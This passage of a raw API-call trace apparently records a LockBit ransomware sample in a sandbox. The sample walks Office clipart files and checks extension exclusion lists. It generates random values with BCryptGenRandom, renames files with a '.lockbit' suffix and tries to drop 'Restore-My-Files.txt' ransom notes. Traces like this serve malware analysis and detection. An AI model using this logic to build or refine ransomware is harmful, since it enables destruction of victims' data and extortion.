dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0150.180] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.180] malloc (_Size=0x40068) returned 0x3d70450 [0150.180] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3680) returned 1 [0150.180] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.180] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0150.181] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.181] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.181] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0150.181] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0150.195] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195772.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195772.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.195] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.195] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0150.195] free (_Block=0x1fa2ed8) [0150.195] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195772.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.195] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.195] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.195] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6600bcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbbc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0195788.WMF", cAlternateFileName="")) returned 1 [0150.195] lstrcmpiW (lpString1=".", lpString2="J0195788.WMF") returned -1 [0150.195] lstrcmpiW (lpString1="..", lpString2="J0195788.WMF") returned -1 [0150.195] PathFindExtensionW (pszPath="J0195788.WMF") returned=".WMF" [0150.195] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.196] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.197] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.197] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0195788.WMF") returned 1 [0150.198] lstrcmpiW (lpString1="ntldr", lpString2="J0195788.WMF") returned 1 [0150.198] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0195788.WMF") returned 1 [0150.198] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0195788.WMF") returned -1 [0150.198] lstrcmpiW (lpString1="autorun.inf", lpString2="J0195788.WMF") returned -1 [0150.198] lstrcmpiW (lpString1="thumbs.db", lpString2="J0195788.WMF") returned 1 [0150.198] lstrcmpiW (lpString1="iconcache.db", lpString2="J0195788.WMF") returned -1 [0150.198] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.198] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195788.WMF") returned=".WMF" [0150.198] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.198] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.198] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.199] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.199] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195788.WMF.lockbit") returned 72 [0150.199] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195788.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0195788.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0150.200] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.200] malloc (_Size=0x40068) returned 0x3df0008 [0150.200] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3004) returned 1 [0150.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0150.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0150.202] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.205] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195788.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195788.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.205] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.205] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.206] free (_Block=0x1fa2ed8) [0150.206] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0195788.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.206] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.206] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.206] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x128e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0196060.WMF", cAlternateFileName="")) returned 1 [0150.206] lstrcmpiW (lpString1=".", lpString2="J0196060.WMF") returned -1 [0150.206] lstrcmpiW (lpString1="..", lpString2="J0196060.WMF") returned -1 [0150.206] PathFindExtensionW (pszPath="J0196060.WMF") returned=".WMF" [0150.206] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.206] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.207] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.208] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.208] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0150.209] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0150.209] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0150.209] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0150.209] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0196060.WMF") returned 1 [0150.209] lstrcmpiW (lpString1="ntldr", lpString2="J0196060.WMF") returned 1 [0150.209] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0196060.WMF") returned 1 [0150.209] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0196060.WMF") returned -1 [0150.209] lstrcmpiW (lpString1="autorun.inf", lpString2="J0196060.WMF") returned -1 [0150.209] lstrcmpiW (lpString1="thumbs.db", lpString2="J0196060.WMF") returned 1 [0150.209] lstrcmpiW (lpString1="iconcache.db", lpString2="J0196060.WMF") returned -1 [0150.209] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0150.209] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196060.WMF") returned=".WMF" [0150.209] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0150.209] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0150.209] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0150.209] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0150.209] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0150.209] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0150.209] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0150.209] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0150.209] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0150.210] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0150.210] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196060.WMF.lockbit") returned 72 [0150.210] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196060.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0196060.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0150.212] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0150.212] malloc (_Size=0x40068) returned 0x1ff1e60 [0150.212] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4750) returned 1 [0150.212] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.212] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0150.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.213] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.213] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0150.213] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196060.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196060.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0150.218] malloc (_Size=0xa6) returned 0x1fa2ed8 [0150.218] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0150.219] free (_Block=0x1fa2ed8) [0150.219] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0196060.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0150.219] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0150.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0150.220] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56510d10, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x14ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0196110.WMF", cAlternateFileName="")) returned 1 [0150.220] lstrcmpiW (lpString1=".", lpString2="J0196110.WMF") returned -1 [0150.220] lstrcmpiW (lpString1="..", lpString2="J0196110.WMF") returned -1 [0150.220] PathFindExtensionW (pszPath="J0196110.WMF") returned=".WMF" [0150.220] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0150.220] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0150.220] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0150.220] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0150.220] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0150.220] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0150.220] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0150.220] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0150.221] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0150.222] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0150.222] lstrcmpiW 